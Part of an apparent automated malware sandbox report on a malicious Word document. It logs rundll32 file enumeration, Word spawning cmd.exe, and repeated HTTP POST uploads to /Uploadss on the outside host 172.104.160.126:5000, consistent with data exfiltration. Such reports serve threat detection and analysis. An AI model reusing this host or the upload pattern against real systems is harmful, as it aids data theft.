_Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,16_2_00007FFD92CCDD10
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
Source: winword.exeMemory has grown: Private usage: 1MB later: 100MB

Networking

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.104.160.126 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknownNetwork traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49338
Source: global trafficTCP traffic: 192.168.2.6:49191 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------f9fa7306880345da
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------f13a1e66d9ac3858
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------3db099609e8ee48c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------f661165eccdedd9dExpect: 100-continue
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2fe595d5319db200
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4b737e61e1b7e9bf
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4e35b57d9f58fc90
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------815ab7d36e08e457
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a5d52e19e3fe200b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ec3ba31dfe96d326
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f22aeea0bd5a0f8e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8bdcfc228d82f5a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cfe9280e100efce1
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------904a2babf6d2f7ac
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f49946b6384ac060
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b85ce3e308f45060
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------614e08f55f0c2cfe
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bea6c7b09692f28c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23dd402f4b4a39c5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e591042c4603c21a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0f76a6adccf351c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c4d90e433018b142
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2ca679a5d8f632b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------72fb5c35750f8204
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------43289e4b14c04ac7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------71ca7f7e591272d4
